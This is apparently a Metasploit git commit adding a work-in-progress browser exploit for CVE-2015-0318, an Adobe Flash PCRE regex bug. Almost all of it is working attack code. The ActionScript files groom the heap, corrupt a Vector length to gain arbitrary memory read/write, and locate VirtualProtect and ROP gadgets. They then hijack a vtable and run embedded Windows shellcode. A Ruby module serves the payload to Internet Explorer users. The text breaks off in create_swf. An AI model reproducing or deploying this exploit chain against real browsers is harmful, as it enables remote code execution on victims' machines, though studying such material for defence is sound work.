Starting point for CVE-2015-0318

bug/bundler_fix
sinn3r 2015-03-11 09:58:41 -05:00
parent df80d56fda
commit 2a9d6e64e2
6 changed files with 1144 additions and 0 deletions

Binary file not shown.

View File

@ -0,0 +1,666 @@
package
{
import flash.display.*;
import flash.utils.ByteArray;
import flash.external.ExternalInterface;
public class Main extends Sprite
{
private var i:int;
private var j:int;
private const OP_END:int = 0;
private const OP_ANY:int = 12;
private const OP_KET:int = 84;
private const OP_CBRA:int = 94;
private const OP_FAIL:int = 108;
private const OP_ACCEPT:int = 109;
private var testSubject:String = 'c01db33f';
private var subject:String = '';
private var count_576:int = 128;
private var pre_576:int = 4;
private var groom_576:Array = new Array(count_576);
private var count_re:int = 8;
private var source_re:Vector.<String> = new Vector.<String>(count_re);
private var compiled_re:Vector.<RegExp> = new Vector.<RegExp>(count_re);
private var subjects:Vector.<String> = new Vector.<String>(count_re);
private var count_504:int = 256 * 3;
private var pre_504:int = 30;
private var groom_504:Array = new Array(count_504);
private var junk:Array = new Array();
private var junk_idx:int = 0;
public static function Alert(message:String):void {
ExternalInterface.call('debug_alert', message);
}
public static function Debug(message:String):void {
ExternalInterface.call('debug_print', message);
}
public function MakeRegex(c:String):String {
var i:int;
var r:String = '(c01db33f|^(' + c + '*)'
for (i = 0; i < 39; ++i) {
r += '(A)';
}
r += '\\'
r += '41';
for (i = 0; i < 20; ++i) {
r += 'A';
}
r += '('
r += '\\'
r += 'c'
r += '\uc080'
r += '*)?(?70))';
return r;
}
public function MakeSubject(c:String):String {
var i:int;
var s:String = c;
for (i = 0; i < 0x80 - 0x3d; ++i) {
s += c;
}
for (i = 0; i < 60; ++i) {
s += 'A';
}
return s;
}
public function MakeByteArray(size:int):ByteArray {
var i:int = 0;
var b:ByteArray = new ByteArray();
b.length = size;
for (i = 0; i < size; ++i) {
b.writeByte(0x23);
}
return b;
}
public function Initialise():void {
for (i = 0; i < 8; ++i) {
subjects[i] = MakeSubject(i.toString());
source_re[i] = MakeRegex(i.toString());
}
}
public function CompileRegex():RegExp {
// heap groom the block of regex bytecode we want to follow our
// legitimate bytecode.
for (i = 0; i < count_576; ++i) {
var b:ByteArray = new ByteArray();
b.length = 576;
// regex nop sled :-p
for (j = 0; j < 500; ++j) {
b.writeByte(OP_ANY);
}
// this is the capturing bracket that find_bracket will be
// looking for to match (?70)
b.writeByte(OP_CBRA);
b.writeByte(1); // WORD length of group (only != 0)
b.writeByte(0);
b.writeByte(0); // WORD number of group (must == 70)
b.writeByte(70);
// we use OP_CBRA to write the current match length at one
// dword past the end of our offset_vector.
//
// this is due to another bug in pcre_exec where it is
// assumed that the group number is
// 0 < number < md->offset_max
// and it is only checked that group < md->offset_max, and
// then indexing is done backwards frm the end of the buffer,
// so a group number of 0 lets us index one dword past the end
// of the offset_vector.
b.writeByte(OP_CBRA);
b.writeByte(0); // WORD length of group
b.writeByte(0);
b.writeByte(0); // WORD number of group
b.writeByte(0);
// we're done with executing this regex for now.
b.writeByte(OP_ACCEPT); // yay a match :-)
b.writeByte(OP_KET); // closing KET for group (?70)
b.writeByte(OP_KET); // closing KET for exploit group
b.writeByte(OP_END);
b.writeByte(0);
groom_576[i] = b;
}
// make some gaps
for (i = 0; i < count_576; i += 2) {
groom_576[i].length = 0;
groom_576[i] = null;
}
for (i = 0; i < (pre_576 * 2); i += 2) {
groom_576[i] = MakeByteArray(576);
}
for (i = 0; i < count_re; ++i) {
try {
Debug('[*] compiling regex');
var re:RegExp = new RegExp(source_re[i]);
compiled_re[i] = re;
var match:Object = re.exec(testSubject);
if (match != null && match[0] == 'c01db33f') {
Debug('[*] compiled successfully');
subject = subjects[i];
return re;
}
else {
// that allocation was no good, fill with a bytearray
junk[junk_idx++] = MakeByteArray(576);
}
} catch (error:Error) {
Debug('[*] error compiling regex: ' + error.message);
}
Debug('[*] failed...');
}
Debug('[*] failed first groom');
return null;
}
public function negative(i:uint):uint {
return (~i) + 1;
}
public function CorruptVector(r:RegExp):Vector.<uint> {
var v:Vector.<uint> = null;
var uv:Vector.<uint> = null;
var ov:Vector.<Object> = null;
for (i = 0; i < count_504; ++i) {
v = new Vector.<uint>(124);
v[0] = 0xc01db33f
v[1] = i;
for (j = 2; j < 124; ++j) {
v[j] = 0x88888888;
}
groom_504[i] = v;
}
for (i = 0; i < count_504; i += 3) {
groom_504[i].length = 0;
groom_504[i] = null;
}
for (i = 0; i < pre_504; i += 1) {
junk[junk_idx++] = MakeByteArray(504);
}
v = null;
for (i = 0; i < 128; i += 3) {
try {
Debug('[*] executing regex');
r.exec(subject);
} catch (error:Error) {
Debug('[*] regex execution failed: ' + error.message);
}
for (j = 1; j < count_504; j += 3) {
if (groom_504[j].length != 124) {
Debug('[*] corrupted vector');
v = groom_504[j];
break;
}
}
if (v != null) {
break;
}
Debug('[*] failed...');
junk[junk_idx++] = MakeByteArray(504);
junk[junk_idx++] = MakeByteArray(504);
}
// at this point we have a vector with a corrupt length, hopefully
// followed by another vector of legitimate length.
if (v == null) {
Debug('[*] failed to groom for vector corruption');
return null;
}
if (v[126] != 0xc01db33f) {
Debug('[*] magic check failed!');
}
// read out the index of the following vector; this is the vector
// that we will use for the rest of the exploit
i = v[127];
uv = groom_504[i];
uv.fixed = true;
// corrupt the length of uv so that we can access all of memory :)
v[124] = 0xffffffff;
// first fix the length of the original corrupted array so we don't
// need to worry about it any more...
uv[negative(0x80)] = 0x6e;
// now read back 0x1f8 bytes before the first vector; this must be
// inside the original offset_vector that we overflowed, (so it is
// guaranteed to be safe) and this buffer is directly free'd at the
// end of pcre_exec. as it's quite a large allocation, we can be
// quite sure that it is still on the freelist and we can steal the
// freelist pointer from it, which will likely point to the block
// after our second vector.
uv[0] = uv[negative(0xfe)];
// we really can't do much sanity checking here; all we know is
// that this should be a pointer, and it will be 8 byte aligned.
if ((uv[0] & 0xf) != 0x8 && (uv[0] & 0xf) != 0 && uv[0] > 0x10000) {
Debug('[*] freelist ptr sanity check failed!');
uv[negative(2)] = 0x6e;
return null;
}
// uv[0] == address of our vector.<uint>'s buffer
uv[0] -= 0x1f0;
return uv;
}
public function FindGCHeap(m:Memory):uint {
// nothing much to say about this; we know that there's a
// FixedBlock at the start of the page that our vector is allocated
// on, and that holds a pointer back to the global GCHeap, which is
// a static singleton in the flash module. I've copied in the class
// declarations for the structures being traversed, for reference.
var fixed_block:uint = m.vector_base & 0xfffff000;
/*
struct FixedBlock
{
void* firstFree; // First object on the block's free list
void* nextItem; // First object free at the end of the block
FixedBlock* next; // Next block on the list of blocks (m_firstBlock list in the allocator)
FixedBlock* prev; // Previous block on the list of blocks
uint16_t numAlloc; // Number of items allocated from the block
uint16_t size; // Size of objects in the block
FixedBlock *nextFree; // Next block on the list of blocks with free items (m_firstFree list in the allocator)
FixedBlock *prevFree; // Previous block on the list of blocks with free items
-------> FixedAlloc *alloc; // The allocator that owns this block
char items[1];l // Memory for objects starts here
};
*/
var fixed_alloc:uint = m.read_dword(fixed_block + 0x1c);
/*
class FixedAlloc
{
private:
-------> GCHeap *m_heap; // The heap from which we obtain memory
uint32_t m_itemsPerBlock; // Number of items that fit in a block
uint32_t m_itemSize; // Size of each individual item
FixedBlock* m_firstBlock; // First block on list of free blocks
FixedBlock* m_lastBlock; // Last block on list of free blocks
FixedBlock* m_firstFree; // The lowest priority block that has free items
size_t m_numBlocks; // Number of blocks owned by this allocator
#ifdef MMGC_MEMORY_PROFILER
size_t m_totalAskSize; // Current total amount of memory requested from this allocator
#endif
bool const m_isFixedAllocSafe; // true if this allocator's true type is FixedAllocSafe
}
*/
var gcheap:uint = m.read_dword(fixed_alloc);
return gcheap;
}
public function FindPwned(m:Memory, gcheap:uint):uint {
// we're going to walk the heap to find it because we don't like
// being crashy. a lazier approach would be to spray a ton of
// objects and scan forward from our array; this is more reliable.
/*
class GCHeap
{
public:
-------> Region *lastRegion;
private:
...
};
*/
// I have no idea why this is at offset 4. GCheap is not virtual
// so perhaps the Flash code has changed since the github avmplus
// release.
var region:uint = m.read_dword(gcheap + 4);
/*
class Region
{
public:
Region *prev;
char *baseAddr;
char *reserveTop;
char *commitTop;
size_t blockId;
};
*/
while (region != 0) {
var region_base:uint = m.read_dword(region + 4);
var region_rtop:uint = m.read_dword(region + 8);
var region_top:uint = m.read_dword(region + 12);
if (region_rtop & 1 != 0) {
Debug('[*] this browser already got pwned, go away');
return 0;
}
m.write_dword(region + 8, region_rtop + 1);
// TODO: we can optimise here as we know the alignment of the
// magic values.
Alert(' [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']');
for (var ptr:uint = region_base; ptr < region_top - 16; ptr += 4) {
if (m.read_dword(ptr) == 0xdecafbad
&& m.read_dword(ptr + 4) == 0xdecafbad) {
// we have found our two magic values
return ptr - 0x10;
}
}
// region = region->prev;
region = m.read_dword(region);
}
return 0;
}
public function WriteShellcode(v:Vector.<uint>, i:uint, ptr:uint, fun:uint):void {
// at this point we are sandwiched on the stack between the current
// frame and the previous frame; this is hazardous, we need to
// shift our stack back above the current frame or things will go
// wrong(tm).
v[i++] = 0x1000ec81; // 81ec00100000 sub esp, 0x1000
v[i++] = 0x90900000;
//v[i++] = 0xcccccccc;
// we're using skylined's win32 calc shellcode, the function
// version that saves registers, but without the ret at the end...
v[i++] = 0x52d23160;
v[i++] = 0x6c616368;
v[i++] = 0x52e68963;
v[i++] = 0x728b6456;
v[i++] = 0x0c768b30;
v[i++] = 0xad0c768b;
v[i++] = 0x7e8b308b;
v[i++] = 0x3c5f8b18;
v[i++] = 0x781f5c8b;
v[i++] = 0x201f748b;
v[i++] = 0x4c8bfe01;
v[i++] = 0xf901241f;
v[i++] = 0x512cb70f;
v[i++] = 0x3c81ad42;
v[i++] = 0x6e695707;
v[i++] = 0x8bf17545;
v[i++] = 0x011c1f74;
v[i++] = 0xae3c03fe;
v[i++] = 0x5858d7ff;
v[i++] = 0x90909061;
// we just put things back how they were; at least, everything
// important. we need esp and ebp to be correct, which is easy;
// we need ecx to point to the object's vtable and then we can
// just jump to the actual method implementation as though we
// had hooked it.
v[i++] = 0x0bf8c481; // 81C4F80B0000 add esp,0xbf8
v[i++] = 0x90900000;
v[i++] = 0x1c24ac8d; // 8DAC241c120000 lea ebp,[esp+0x121c]
v[i++] = 0x90000012;
v[i++] = 0xb9909090; // B944434241 mov ecx, vtable_ptr
v[i++] = ptr;
v[i++] = 0xb8909090; // B844434241 mov eax, orig_function_ptr
v[i++] = fun;
v[i++] = 0x9090e0ff; // FFE0 jmp eax
}
public function Main() {
i = 0;
Initialise();
var r:RegExp = CompileRegex();
if (r == null) {
return;
}
Alert('hai');
var v:Vector.<uint> = CorruptVector(r);
if (v == null) {
Debug("CorruptVector returns null");
return;
}
Alert("Memory");
var m:Memory = new Memory(v, v[0], 0x6e);
// at this point we have an absolute read/write primitive letting
// us read and write dwords anywhere in memory, so everything else
// is a technicality.
// we need an exception handler from here, because we have a vector
// that's addressing the whole address space, and if anything goes
// wrong, we want to clean that up or things will get unpleasant.
try {
// first we follow some pointers on the heap back to retrieve
// the address of the static GCHeap object in the flash module.
// this is useful for two reasons; firstly it gives us a
// pointer into the flash module, but secondly (and more
// importantly) we can use the region lists in the GCHeap
// structure to safely scan the heap to find things.
var gcheap:uint = FindGCHeap(m);
if (gcheap == 0) {
return;
}
// now we can parse the flash module in memory, locate useful
// imports and find the stack adjust gadget that we need.
Debug('[*] scanning flash module for gadgets');
var p:PE32 = new PE32(m, gcheap);
Debug(' [-] ' + p.base.toString(16) + ' flash base');
var virtual_protect:uint = p.GetImport('KERNEL32.dll', 'VirtualProtect');
Debug(' [-] ' + virtual_protect.toString(16) + ' kernel32!VirtualProtect');
// 81 c4 40 00 00 00 add esp, 40h
// c3 ret
var gadget_bytes:ByteArray = new ByteArray();
gadget_bytes.length = 7;
gadget_bytes.writeByte(0x81);
gadget_bytes.writeByte(0xc4);
gadget_bytes.writeByte(0x40);
gadget_bytes.writeByte(0x00);
gadget_bytes.writeByte(0x00);
gadget_bytes.writeByte(0x00);
gadget_bytes.writeByte(0xc3);
var add_esp_40h_ret:uint = p.GetGadget(gadget_bytes);
var ret:uint = add_esp_40h_ret + 6;
Debug(' [-] ' + add_esp_40h_ret.toString(16) + ' add esp, 40h; ret');
Debug(' [-] ' + ret.toString(16) + ' ret');
// now we create an actionscript class that we can readily
// signature on the heap; we're going to find this object and
// overwrite its vtable pointer to gain control of execution.
Debug('[*] scanning heap to find pwned object');
var pwned:Pwned = new Pwned();
var pwned_ptr:uint = FindPwned(m, gcheap);
Debug('[*] pwned object: ' + pwned_ptr.toString(16));
if (pwned_ptr == 0) {
return;
}
// we have a pointer to the object; save the vtable pointer for
// replacement later and then create a new vtable containing
// our gadget at the correct offset for the 'Rop' function.
// object ptr is actually a ScriptObject* for our ClassClosure?
var object_ptr:uint = m.read_dword(pwned_ptr + 8);
var vtable_ptr:uint = m.read_dword(object_ptr + 18 * 4);
var method_ptr:uint = m.read_dword(vtable_ptr + 4);
var shellcode:uint = m.vector_base + 4;
WriteShellcode(v, 1, vtable_ptr, method_ptr);
// invoking the method first makes our life simpler; otherwise
// flash will go hunt for the right method, and recovery was
// quite messy.
var a:uint = 0x61616161;
pwned.Rop(
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a);
// overwrite the method pointer
m.write_dword(vtable_ptr + 4, add_esp_40h_ret);
// fix up our vector length already, since we won't need it again.
m.Cleanup();
var PAGE_EXECUTE_READWRITE:uint = 0x40;
// where better to rop than the actual stack :-P
Debug('[*] getting ma rop on');
pwned.Rop(
// ret sled oh yeah!
// actually this is just me lazily making stack space so
// that VirtualProtect doesn't trample all over any of
// flash's stuff and make it have a sad.
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret, // 3f
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret, // 7f
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret, // cf
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
ret, ret, ret, ret, ret, ret, ret, ret,
virtual_protect, // BOOL WINAPI VirtualProtect(
shellcode, // ...
shellcode, // LPVOID lpAddress,
0x1000, // SIZE_T dwSize,
PAGE_EXECUTE_READWRITE, // DWORD flNewProtect,
m.vector_base, // LPDWORD lpflOldProtect
// );
0x41414141, 0x41414141);
Debug('[*] we survived!');
// no need to fix the vtable, as we only overwrote the pointer
// for the Rop method, and it won't get called again.
} catch (e:Error) {
Debug('[!] error: ' + e.message);
} finally {
// we *always* need to clean up our corrupt vector as flash
// will try to zero it out later otherwise...
Debug('[*] cleaning up corrupted vector');
m.Cleanup();
}
}
}
}

View File

@ -0,0 +1,150 @@
package
{
// some utilities to encapsulate using the relative read/write of the
// corrupt vector.<uint> as an absolute read/write of the whole address
// space.
public class Memory
{
public var vector:Vector.<uint>;
public var vector_base:uint;
public var vector_size:uint;
private static function negative(i:uint):uint {
return (~i) + 1;
}
public function Memory(v:Vector.<uint>, b:uint, s:uint) {
vector = v;
vector_base = b;
vector_size = s;
}
public function Cleanup():void {
// restore the correct size to our vector so that flash doesn't
// inadvertently trample on lots of memory.
vector[negative(2)] = vector_size;
}
public function read_dword(address:uint):uint {
var offset:uint = 0;
if (address & 0x3 != 0) {
// NB: we could read 2 dwords here, and produce the correct
// dword, but that could lead to oob reads if we're close to
// a page boundary. take the path of least danger, and throw
// for debugging.
throw 'read_dword called with misaligned address'
}
if (address < vector_base) {
offset = negative((vector_base - address) >> 2);
}
else {
offset = address - vector_base >> 2;
}
try {
return vector[offset];
} catch (e:Error) {
// we can't read at offset 0xffffffff, sometimes we will want
// to, but that is just life.
}
return 0;
}
public function read_byte(address:uint):uint {
var dword_address:uint = address & 0xfffffffc;
var dword:uint = read_dword(dword_address);
while (address & 0x3) {
dword = dword >> 8;
address -= 1;
}
return (dword & 0xff);
}
public function read_string(address:uint):String {
var string:String = '';
var dword:uint = 0;
while (address & 0x3) {
var char:uint = read_byte(address);
if (char == 0) {
return string;
}
string += String.fromCharCode(char);
address += 1;
}
while (true) {
dword = read_dword(address);
if ((dword & 0xff) != 0) {
string += String.fromCharCode(dword & 0xff);
dword = dword >> 8;
}
else {
return string;
}
if ((dword & 0xff) != 0) {
string += String.fromCharCode(dword & 0xff);
dword = dword >> 8;
}
else {
return string;
}
if ((dword & 0xff) != 0) {
string += String.fromCharCode(dword & 0xff);
dword = dword >> 8;
}
else {
return string;
}
if ((dword & 0xff) != 0) {
string += String.fromCharCode(dword & 0xff);
}
else {
return string;
}
address += 4;
}
return string;
}
public function write_dword(address:uint, value:uint):void {
var offset:uint = 0;
if (address & 0x3 != 0) {
// NB: we could read 2 dwords here, and write 2 dwords, and
// produce the correct dword, but that could lead to oob reads
// and writes if we're close to a page boundary. take the path
// of least danger, and throw for debugging.
throw 'write_dword called with misaligned address'
}
if (address < vector_base) {
offset = negative((vector_base - address) >> 2);
}
else {
offset = (address - vector_base) >> 2;
}
vector[offset] = value;
}
}
}

View File

@ -0,0 +1,157 @@
package
{
import flash.utils.ByteArray;
public class PE32
{
private var m:Memory;
public var base:uint;
public var dos_header:uint;
public var nt_header:uint;
public var file_header:uint;
public var opt_header:uint;
private function FindBase(ptr:uint):uint {
ptr = ptr & 0xffff0000;
var dword:uint = m.read_dword(ptr);
while ((dword & 0xffff) != 0x5a4d) {
ptr -= 0x10000;
dword = m.read_dword(ptr);
}
return ptr;
}
public function ParseHeaders():void {
dos_header = base;
var e_lfanew:uint = m.read_dword(dos_header + 60);
nt_header = dos_header + e_lfanew;
var nt_magic:uint = m.read_dword(nt_header);
if (nt_magic != 0x00004550) {
dos_header = 0;
nt_header = 0;
return;
}
file_header = nt_header + 4;
var machine:uint = m.read_dword(file_header);
if ((machine & 0xffff) != 0x014c) {
dos_header = 0;
nt_header = 0;
file_header = 0;
return;
}
opt_header = nt_header + 24;
var opt_magic:uint = m.read_dword(opt_header);
if ((opt_magic & 0xffff) != 0x10b) {
dos_header = 0;
nt_header = 0;
file_header = 0;
opt_header = 0;
return;
}
}
public function GetImport(mod_name:String, fun_name:String):uint {
if (base == 0 || dos_header == 0) {
return 0;
}
var data_directory:uint = opt_header + 96;
var import_dir:uint = data_directory + 8;
var import_rva:uint = m.read_dword(import_dir);
var import_size:uint = m.read_dword(import_dir + 4);
if (import_size == 0) {
return 0;
}
var import_descriptor:uint = base + import_rva;
var orig_first_thunk:uint = m.read_dword(import_descriptor);
while (orig_first_thunk != 0) {
var module_name_ptr:uint =
dos_header + m.read_dword(import_descriptor + 12);
if (module_name_ptr != 0) {
var module_name:String = m.read_string(module_name_ptr);
if (module_name == mod_name) {
orig_first_thunk += dos_header;
break;
}
}
import_descriptor += (5 * 4);
orig_first_thunk = m.read_dword(import_descriptor);
}
var first_thunk:uint = dos_header + m.read_dword(import_descriptor + 16);
var thunk:uint = orig_first_thunk;
var import_by_name_rva:uint = m.read_dword(thunk);
while (import_by_name_rva != 0) {
var function_name_ptr:uint = dos_header + import_by_name_rva + 2;
var function_name:String = m.read_string(function_name_ptr);
if (function_name == fun_name) {
return m.read_dword(first_thunk);
}
thunk += 4;
first_thunk += 4;
import_by_name_rva = m.read_dword(thunk);
}
return 0;
}
public function GetGadget(gadget:ByteArray):uint {
var opt_header_size:uint = m.read_dword(file_header + 16) & 0xffff;
var section_count:uint = (m.read_dword(file_header) >> 16) & 0xffff;
var section_header:uint = opt_header + opt_header_size;
for (var i:uint = 0; i < section_count; ++i) {
var characteristics:uint = m.read_dword(section_header + (9 * 4));
if ((characteristics & 0xe0000000) == 0x60000000) {
// this section is read/execute, so scan for gadget
var section_rva:uint = m.read_dword(section_header + 12);
var section_size:uint = m.read_dword(section_header + 16);
var section_base:uint = base + section_rva;
var section:ByteArray = new ByteArray();
section.endian = "littleEndian";
section.length = section_size;
for (var j:uint = 0; j < section_size; j += 4) {
section.writeUnsignedInt(
m.read_dword(section_base + j));
}
for (j = 0; j < section_size; j += 1) {
section.position = j;
gadget.position = 0;
while (section.readByte() == gadget.readByte()) {
if (gadget.position == gadget.length) {
return section_base + j;
}
}
}
}
section_header += 10 * 5;
}
return 0;
}
public function PE32(memory:Memory, ptr:uint) {
m = memory;
base = FindBase(ptr);
ParseHeaders();
}
}
}

View File

@ -0,0 +1,51 @@
package
{
public class Pwned
{
public var magic1:uint;
public var magic2:uint;
public function Rop(
arg_00:uint, arg_01:uint, arg_02:uint, arg_03:uint, arg_04:uint, arg_05:uint, arg_06:uint, arg_07:uint,
arg_08:uint, arg_09:uint, arg_0a:uint, arg_0b:uint, arg_0c:uint, arg_0d:uint, arg_0e:uint, arg_0f:uint,
arg_10:uint, arg_11:uint, arg_12:uint, arg_13:uint, arg_14:uint, arg_15:uint, arg_16:uint, arg_17:uint,
arg_18:uint, arg_19:uint, arg_1a:uint, arg_1b:uint, arg_1c:uint, arg_1d:uint, arg_1e:uint, arg_1f:uint,
arg_20:uint, arg_21:uint, arg_22:uint, arg_23:uint, arg_24:uint, arg_25:uint, arg_26:uint, arg_27:uint,
arg_28:uint, arg_29:uint, arg_2a:uint, arg_2b:uint, arg_2c:uint, arg_2d:uint, arg_2e:uint, arg_2f:uint,
arg_30:uint, arg_31:uint, arg_32:uint, arg_33:uint, arg_34:uint, arg_35:uint, arg_36:uint, arg_37:uint,
arg_38:uint, arg_39:uint, arg_3a:uint, arg_3b:uint, arg_3c:uint, arg_3d:uint, arg_3e:uint, arg_3f:uint,
arg_40:uint, arg_41:uint, arg_42:uint, arg_43:uint, arg_44:uint, arg_45:uint, arg_46:uint, arg_47:uint,
arg_48:uint, arg_49:uint, arg_4a:uint, arg_4b:uint, arg_4c:uint, arg_4d:uint, arg_4e:uint, arg_4f:uint,
arg_50:uint, arg_51:uint, arg_52:uint, arg_53:uint, arg_54:uint, arg_55:uint, arg_56:uint, arg_57:uint,
arg_58:uint, arg_59:uint, arg_5a:uint, arg_5b:uint, arg_5c:uint, arg_5d:uint, arg_5e:uint, arg_5f:uint,
arg_60:uint, arg_61:uint, arg_62:uint, arg_63:uint, arg_64:uint, arg_65:uint, arg_66:uint, arg_67:uint,
arg_68:uint, arg_69:uint, arg_6a:uint, arg_6b:uint, arg_6c:uint, arg_6d:uint, arg_6e:uint, arg_6f:uint,
arg_70:uint, arg_71:uint, arg_72:uint, arg_73:uint, arg_74:uint, arg_75:uint, arg_76:uint, arg_77:uint,
arg_78:uint, arg_79:uint, arg_7a:uint, arg_7b:uint, arg_7c:uint, arg_7d:uint, arg_7e:uint, arg_7f:uint,
arg_80:uint, arg_81:uint, arg_82:uint, arg_83:uint, arg_84:uint, arg_85:uint, arg_86:uint, arg_87:uint,
arg_88:uint, arg_89:uint, arg_8a:uint, arg_8b:uint, arg_8c:uint, arg_8d:uint, arg_8e:uint, arg_8f:uint,
arg_90:uint, arg_91:uint, arg_92:uint, arg_93:uint, arg_94:uint, arg_95:uint, arg_96:uint, arg_97:uint,
arg_98:uint, arg_99:uint, arg_9a:uint, arg_9b:uint, arg_9c:uint, arg_9d:uint, arg_9e:uint, arg_9f:uint,
arg_a0:uint, arg_a1:uint, arg_a2:uint, arg_a3:uint, arg_a4:uint, arg_a5:uint, arg_a6:uint, arg_a7:uint,
arg_a8:uint, arg_a9:uint, arg_aa:uint, arg_ab:uint, arg_ac:uint, arg_ad:uint, arg_ae:uint, arg_af:uint,
arg_b0:uint, arg_b1:uint, arg_b2:uint, arg_b3:uint, arg_b4:uint, arg_b5:uint, arg_b6:uint, arg_b7:uint,
arg_b8:uint, arg_b9:uint, arg_ba:uint, arg_bb:uint, arg_bc:uint, arg_bd:uint, arg_be:uint, arg_bf:uint,
arg_c0:uint, arg_c1:uint, arg_c2:uint, arg_c3:uint, arg_c4:uint, arg_c5:uint, arg_c6:uint, arg_c7:uint,
arg_c8:uint, arg_c9:uint, arg_ca:uint, arg_cb:uint, arg_cc:uint, arg_cd:uint, arg_ce:uint, arg_cf:uint,
arg_d0:uint, arg_d1:uint, arg_d2:uint, arg_d3:uint, arg_d4:uint, arg_d5:uint, arg_d6:uint, arg_d7:uint,
arg_d8:uint, arg_d9:uint, arg_da:uint, arg_db:uint, arg_dc:uint, arg_dd:uint, arg_de:uint, arg_df:uint,
arg_e0:uint, arg_e1:uint, arg_e2:uint, arg_e3:uint, arg_e4:uint, arg_e5:uint, arg_e6:uint, arg_e7:uint,
arg_e8:uint, arg_e9:uint, arg_ea:uint, arg_eb:uint, arg_ec:uint, arg_ed:uint, arg_ee:uint, arg_ef:uint,
arg_f0:uint, arg_f1:uint, arg_f2:uint, arg_f3:uint, arg_f4:uint, arg_f5:uint, arg_f6:uint, arg_f7:uint,
arg_f8:uint, arg_f9:uint, arg_fa:uint, arg_fb:uint, arg_fc:uint, arg_fd:uint, arg_fe:uint, arg_ff:uint):uint
{
return magic1 + magic2;
}
public function Pwned()
{
magic1 = 0xdecafbad;
magic2 = 0xdecafbad;
}
}
}

View File

@ -0,0 +1,120 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000'
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player PCRE Regex Vulnerability",
'Description' => %q{
Flash
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mark Brand' # Found vuln
],
'References' =>
[
[ 'CVE', '2015-0318' ],
[ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ],
[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ]
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
# 'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => OperatingSystems::Match::WINDOWS,
:ua_name => Msf::HttpClients::IE,
#:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Nov 25 2014",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
#shellcode = get_payload(cli, target_info).unpack("H*")[0]
html_template = %Q|<html>
<body>
<object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="" Play="true"/>
</object>
<script>
function debug_alert(msg) {
alert(msg);
}
function debug_print(msg) {
alert(msg);
}
</script>
</body>
</html>
|
return html_template, binding()
end
def create_swf
